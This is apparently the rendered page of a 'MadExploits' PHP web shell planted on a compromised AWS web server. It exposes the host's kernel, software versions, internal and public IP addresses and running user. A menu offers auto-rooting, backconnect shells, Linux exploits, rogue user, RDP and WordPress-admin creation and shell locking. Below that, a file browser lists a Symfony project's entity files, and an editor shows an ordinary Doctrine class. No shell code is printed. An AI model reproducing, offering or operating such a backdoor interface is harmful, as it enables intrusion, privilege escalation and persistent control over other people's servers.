Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.21.106.4
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
boaz /
src /
Entity /
[ HOME SHELL ]
Name
Size
Permission
Action
Cargo.php
3.6
KB
-rw-rw-r--
Depot.php
1.12
KB
-rw-rw-r--
Loading.php
4.95
KB
-rw-rw-r--
ReleaseOrder.php
9.39
KB
-rw-rw-r--
Subcargo.php
2.86
KB
-rw-rw-r--
User.php
4.86
KB
-rw-rw-r--
UserDepot.php
1.61
KB
-rw-rw-r--
googleda794cd9937527d01.html
29
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : UserDepot.php
<?php namespace App\Entity; use App\Repository\UserDepotRepository; use Doctrine\ORM\Mapping as ORM; /** * @ORM\Entity(repositoryClass=UserDepotRepository::class) */ class UserDepot { /** * @ORM\Id * @ORM\GeneratedValue * @ORM\Column(type="integer") */ private $id; /** * @ORM\ManyToOne(targetEntity=User::class) * @ORM\JoinColumn(nullable=false) */ private $user; /** * @ORM\ManyToOne(targetEntity=Depot::class) * @ORM\JoinColumn(nullable=false) */ private $depot; /** * @ORM\Column(type="datetime") */ private $checkin; /** * @ORM\Column(type="datetime", nullable=true) */ private $checkout; public function getId(): ?int { return $this->id; } public function getUser(): ?User { return $this->user; } public function setUser(?User $user): self { $this->user = $user; return $this; } public function getDepot(): ?Depot { return $this->depot; } public function setDepot(?Depot $depot): self { $this->depot = $depot; return $this; } public function getCheckin(): ?\DateTimeInterface { return $this->checkin; } public function setCheckin(\DateTimeInterface $checkin): self { $this->checkin = $checkin; return $this; } public function getCheckout(): ?\DateTimeInterface { return $this->checkout; } public function setCheckout(?\DateTimeInterface $checkout): self { $this->checkout = $checkout; return $this; } }
Close